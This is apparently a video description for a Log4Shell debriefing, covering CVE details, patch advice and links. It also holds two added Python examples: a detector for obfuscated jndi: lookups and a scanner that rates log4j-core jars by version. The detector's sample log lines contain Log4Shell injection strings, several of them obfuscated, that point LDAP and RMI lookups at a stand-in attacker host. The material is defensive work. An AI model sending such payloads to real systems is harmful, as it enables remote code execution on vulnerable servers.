LOG4SHELL - ARE YOU TIRED YET? (CVE-2021-44228 and CVE-2021-45046 and new mutations)

Published: 05 October 2024
on channel: DevXplaining

It's mutating! Time for a full Log4Shell debriefing: I'll go through the exploits CVE-2021-44228 and CVE-2021-45046, how to protect against those vulnerabilities, and what has happened since this all began. This video is a bit longer, and I'll cover many details and answer questions that were asked in the comment sections of my previous videos, so sit down, grab a good drink, and educate yourself a bit more. At the end, I'll show something called Logout4Shell, and some memes.

As always, feel free to drop comments and questions, fill in details, and most importantly post any good Log4Shell memes that made you smile. Also, do you want more of these, or are you tired of hearing about Log4Shell and think it's time to move on? Let me know in the comments section!

Timecodes:
0:00 - Introduction
0:53 - CVE-2021-44228 and CVE-2021-45046, the original and new vulnerabilities and patches
3:50 - Log4Shell is mutating - can you detect it?
6:50 - How to patch things the best and easy way, right now?
8:10 - Do the new JVM versions protect you from this attack?
10:37 - Some command line mitigations for desperate measures
17:20 - Log4jHotPatch - agent to dynamically patch running processes that cannot be stopped
19:58 - How about products and services that contain log4j?
21:20 - Use vulnerability to patch vulnerability (Please don't! :)
22:59 - Log4Shell memes galore and own feelings and thoughts
26:44 - Conclusion and ending words
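The "Log4Shell is mutating" segment in the timecodes above is about attackers hiding the jndi: lookup inside other Log4j lookups (${lower:j}, ${::-j}, ${env:NOPE:-j} and so on) so that a plain grep for `${jndi:` misses the probe. The following is an added example, not code from the video or from Log4j itself: a small Python normalizer that collapses nested lookups innermost-first, the way a vulnerable Log4j 2.x would, and flags a line as soon as a jndi: prefix surfaces. It emulates only the lookups attackers use for obfuscation (lower, upper, and the ":-" default that every lookup accepts); the sample log lines, IP address and hostnames are constructed for the example.

```python
import re
from typing import List, Tuple

# Innermost ${...} lookup: no nested "${" or "}" inside the braces.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_MAX_STEPS = 200  # guard against pathologically deep nesting


def _resolve(body: str) -> Tuple[str, bool]:
    """Resolve one innermost lookup the way a vulnerable Log4j 2.x would.

    Returns (replacement_text, is_jndi). Only the pieces attackers use for
    obfuscation are emulated here: the lower/upper lookups and the ':-'
    default that any lookup accepts. Everything else is left as an
    unresolved marker, which is also what Log4j does with keys it cannot
    resolve.
    """
    var, _, default = body.partition(":-")      # ${var:-default}
    prefix, _, key = var.partition(":")         # ${prefix:key}
    prefix = prefix.lower()                     # Log4j lower-cases the prefix
    if prefix == "jndi":
        return body, True
    if prefix == "lower":
        return key.lower(), False
    if prefix == "upper":
        return key.upper(), False
    if ":-" in body:                            # unknown/unset lookup, default wins
        return default, False
    return "[unresolved:" + body + "]", False   # contains no "${", so never re-expanded


def normalize(message: str) -> Tuple[str, bool]:
    """Collapse nested lookups innermost-first; stop once a jndi: lookup surfaces."""
    current = message
    for _ in range(_MAX_STEPS):
        m = _INNERMOST.search(current)
        if m is None:
            return current, False
        value, is_jndi = _resolve(m.group(1))
        if is_jndi:
            return current, True
        current = current[:m.start()] + value + current[m.end():]
    return current, True  # nesting that deep is an attack in its own right


def is_log4shell_probe(line: str) -> bool:
    return normalize(line)[1]


def scan(lines: List[str]) -> List[int]:
    """Indexes of lines that carry a (possibly obfuscated) jndi: lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample access-log lines; the addresses are placeholders, not real traffic.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://attacker.example/a}"',
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${${upper:${lower:J}}nDi:rmi://attacker.example/x}"',
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64) ${date:yyyy}"',
    '10.0.0.5 - - "GET /${foo}/bar HTTP/1.1" 404 "curl/7.79.1"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LINES):
        print(f"line {i}: {normalize(SAMPLE_LINES[i])[0]}")
```

Two points a practitioner should keep in mind: the prefix comparison is case-insensitive on purpose, because Log4j lower-cases the lookup prefix before dispatching it, so `${JnDi:...}` is just as live as `${jndi:...}`; and a line that needs more than `_MAX_STEPS` expansions is reported as a probe rather than silently dropped, since nothing benign nests lookups two hundred deep.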


Here are some links:
   • Log4J Security Vulnerability: CVE-202...   (Part 1 of my series)
   • Log4Shell Security Exploit Deep Dive ...   (Part 2 of my series)
https://cve.mitre.org/cgi-bin/cvename...
https://threatpost.com/apache-log4j-l...
https://aws.amazon.com/blogs/opensour...
https://aws.amazon.com/security/secur...
https://www.microsoft.com/security/bl...
https://log4jmemes.com/

NOTE: Things move fast, so here are some updates to this video (or watch my more recent ones):
As I suspected, more vulnerabilities have been discovered since the original one.
Log4j 2.15.0 (and 2.16.0) is not good enough; update to 2.17.0 or later as soon as it is available for your branch.
Command-line parameters do not fully protect you: tricks like setting log4j2.formatMsgNoLookups=true or relying on the JVM's remote-codebase toggles are not enough to give full protection (CVE-2021-45046 is exactly the case where message-lookup switches did not help).
Read more here, under "Older (discredited) mitigation measures": https://logging.apache.org/log4j/2.x/...
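To act on the notes above (a 2.x build below the fixed release is only acceptable if JndiLookup.class has been removed from it), here is an added example that is not from the video or from the Log4j project: a Python scanner that walks a directory, opens every jar/war/ear, recurses into archives nested inside archives (WARs, EARs, shaded jars), reads log4j-core's Maven pom.properties (falling back to the jar filename), and reports each log4j-core it finds as fixed, mitigated or VULNERABLE. The per-branch thresholds (2.3.1, 2.12.3, 2.17.0) are the CVE-2021-45105 fix releases; raise them as later fixes land. The jars the demo scans are constructed fixtures written into a temporary directory, not real Log4j builds.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, Optional, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# First release per branch with the CVE-2021-45105 fix: 2.3.1 (Java 6), 2.12.3 (Java 7), else 2.17.0.
FIXED = {(2, 3): (2, 3, 1), (2, 12): (2, 12, 3)}
DEFAULT_FIXED = (2, 17, 0)
# Matches "version=2.14.1" in pom.properties or "log4j-core-2.14.1" in a jar name.
_VERSION_RE = re.compile(r"(?:^version=|log4j-core-)(\d+)\.(\d+)\.(\d+)", re.MULTILINE)

def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    m = _VERSION_RE.search(text)
    return (int(m[1]), int(m[2]), int(m[3])) if m else None

def classify(version: Optional[Tuple[int, int, int]], jndi_present: bool) -> str:
    if version is None:
        return "unknown version" + (", JndiLookup.class present" if jndi_present else "")
    if version >= FIXED.get(version[:2], DEFAULT_FIXED):
        return "fixed"
    if not jndi_present:
        return "mitigated (JndiLookup.class removed)"
    return "VULNERABLE"

def inspect_archive(zf: zipfile.ZipFile, display: str, out: Dict[str, str]) -> None:
    names = set(zf.namelist())
    if POM_PROPS in names:
        version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
    else:
        version = parse_version(os.path.basename(display))  # fall back to the jar name
    jndi = JNDI_LOOKUP in names
    if version is not None or jndi:
        out[display] = classify(version, jndi)
    for name in names:  # recurse into nested archives: WARs, EARs, shaded/fat jars
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, display + "!/" + name, out)
            except zipfile.BadZipFile:
                pass

def scan_directory(root: str) -> Dict[str, str]:
    """Map archive path (outer!/inner for nested archives) to its status."""
    out: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fname)
                try:
                    with zipfile.ZipFile(path) as zf:
                        inspect_archive(zf, os.path.relpath(path, root).replace(os.sep, "/"), out)
                except zipfile.BadZipFile:
                    pass
    return out

def _zip(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def _fake_log4j_core(version: str, keep_jndi_lookup: bool) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar; not a real Log4j build."""
    entries = {POM_PROPS: f"artifactId=log4j-core\nversion={version}\n".encode(),
               "org/apache/logging/log4j/core/LogEvent.class": b"\xca\xfe\xba\xbe"}
    if keep_jndi_lookup:
        entries[JNDI_LOOKUP] = b"\xca\xfe\xba\xbe"
    return _zip(entries)

def build_fixture(root: str) -> None:
    """Constructed install: loose jars plus a WAR carrying a hand-patched 2.15.0 jar."""
    os.makedirs(os.path.join(root, "lib"))
    files = {
        "lib/log4j-core-2.14.1.jar": _fake_log4j_core("2.14.1", True),
        "lib/log4j-core-2.17.0.jar": _fake_log4j_core("2.17.0", True),
        "lib/log4j-core-2.12.3.jar": _fake_log4j_core("2.12.3", True),
        "app.war": _zip({
            "WEB-INF/lib/log4j-core-2.15.0.jar": _fake_log4j_core("2.15.0", False),
            "WEB-INF/lib/other-1.0.jar": _zip({"com/example/Other.class": b"\xca\xfe\xba\xbe"}),
        }),
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)

def demo() -> Dict[str, str]:
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return scan_directory(root)

if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status:40s} {path}")
```

Run `scan_directory("/path/to/app")` against a real install instead of `demo()`. A "mitigated" result is only as good as the class removal that produced it, so treat it as a stopgap until the jar is actually upgraded, and note that a jar with no pom.properties and no JndiLookup.class is simply not reported, which is the right call for log4j-api and other non-core artifacts.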